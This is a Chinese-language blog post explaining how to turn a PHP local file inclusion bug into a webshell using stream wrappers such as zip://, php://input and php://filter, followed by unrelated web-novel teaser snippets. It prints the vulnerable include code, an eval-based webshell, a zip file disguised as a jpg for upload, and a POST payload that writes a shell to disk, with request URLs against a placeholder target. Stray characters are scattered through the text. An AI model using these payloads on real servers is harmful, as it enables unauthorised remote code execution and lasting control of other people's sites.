php偽協(xié)議的使用[獲得webshell]

一張簡單的圖就能看懂

Paste_Image.png

更詳細的解讀:http://www.freebuf.com/column/148886.html

如何獲得一個webshell?

假設文件包含漏洞文件test.php的后臺代碼為:

<?php
include($_GET[file]);
?>
  1. 如果該站點有文件上傳功能,則可以結(jié)合上傳功能和本地文件包含漏洞獲得webshell,下面提供使用zip://協(xié)議的一種方法
    具體步驟:(此處用上傳圖片功能舉例频祝,具體上傳的繞過在此處不考慮)
  • 新建一個shell.php
<?php
@eval($_GET[value]);
?>
  • 把shell.php份帐,壓縮成shell.zip,修改拓展名為shell.jpg匾荆,然后上傳,假設上傳的目錄為upload
  • 則webshell為:
http://xxxxx/test.php?file=zip://upload/shell.jpg%23shell.php
#xxxxx為目標ip或者域名

2.如果該站點沒有文件上傳功能塘辅,但是allow_url_include=On的話绝页,可以使用php://input在目標機的一個可寫目錄下面寫一個shell.php

  • 先查看allow_url_include的狀態(tài)荠商,這個可以查看phpinfo里面的信息,不然就先假設它是On吧
  • 找到目標機上一個可寫的目錄续誉,這里假設為/root/hello
  • 使用firefox里面的hackbar插件莱没,或者burpsuite代理
#url
http://xxxxx/test.php?file=php://input
#POST
<?php fputs(fopen('/root/hello/shell.php','w'),'<?php @eval($_POST[v]);?>')?>
Paste_Image.png
Paste_Image.png
  • 發(fā)現(xiàn)成功在/root/hello里面得到了shell.php
  • 然后此處要連接shell.php,但是直接訪問http://xxxxx/../../../root/hello/shell.php是不行的酷鸦,此處建議使用file://或者php://filter
#file
http://xxxxx/test.php?file=file:///root/hello/shell.php
#php://filter
http://xxxxx/test.php?file=php://filter/resource=/root/hello/shell.php

這樣就能成功獲得websehll了~當然饰躲,如果allow_url_fopen=On的話,也可以用data://生成shell.php

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末臼隔,一起剝皮案震驚了整個濱河市嘹裂,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌摔握,老刑警劉巖寄狼,帶你破解...
    沈念sama閱讀 211,194評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異氨淌,居然都是意外死亡泊愧,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,058評論 2 385
  • 文/潘曉璐 我一進店門盛正,熙熙樓的掌柜王于貴愁眉苦臉地迎上來删咱,“玉大人,你說我怎么就攤上這事豪筝√底蹋” “怎么了?”我有些...
    開封第一講書人閱讀 156,780評論 0 346
  • 文/不壞的土叔 我叫張陵壤蚜,是天一觀的道長即寡。 經(jīng)常有香客問我,道長袜刷,這世上最難降的妖魔是什么聪富? 我笑而不...
    開封第一講書人閱讀 56,388評論 1 283
  • 正文 為了忘掉前任,我火速辦了婚禮著蟹,結(jié)果婚禮上墩蔓,老公的妹妹穿的比我還像新娘。我一直安慰自己萧豆,他們只是感情好奸披,可當我...
    茶點故事閱讀 65,430評論 5 384
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著涮雷,像睡著了一般阵面。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,764評論 1 290
  • 那天样刷,我揣著相機與錄音仑扑,去河邊找鬼。 笑死置鼻,一個胖子當著我的面吹牛镇饮,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播箕母,決...
    沈念sama閱讀 38,907評論 3 406
  • 文/蒼蘭香墨 我猛地睜開眼储藐,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了嘶是?” 一聲冷哼從身側(cè)響起钙勃,我...
    開封第一講書人閱讀 37,679評論 0 266
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎俊啼,沒想到半個月后肺缕,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,122評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡授帕,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,459評論 2 325
  • 正文 我和宋清朗相戀三年同木,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片跛十。...
    茶點故事閱讀 38,605評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡彤路,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出芥映,到底是詐尸還是另有隱情洲尊,我是刑警寧澤,帶...
    沈念sama閱讀 34,270評論 4 329
  • 正文 年R本政府宣布奈偏,位于F島的核電站坞嘀,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏惊来。R本人自食惡果不足惜丽涩,卻給世界環(huán)境...
    茶點故事閱讀 39,867評論 3 312
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望裁蚁。 院中可真熱鬧矢渊,春花似錦、人聲如沸枉证。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,734評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽室谚。三九已至毡鉴,卻和暖如春崔泵,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背眨补。 一陣腳步聲響...
    開封第一講書人閱讀 31,961評論 1 265
  • 我被黑心中介騙來泰國打工管削, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人撑螺。 一個月前我還...
    沈念sama閱讀 46,297評論 2 360
  • 正文 我出身青樓,卻偏偏與公主長得像崎弃,于是被迫代替她去往敵國和親甘晤。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 43,472評論 2 348

推薦閱讀更多精彩內(nèi)容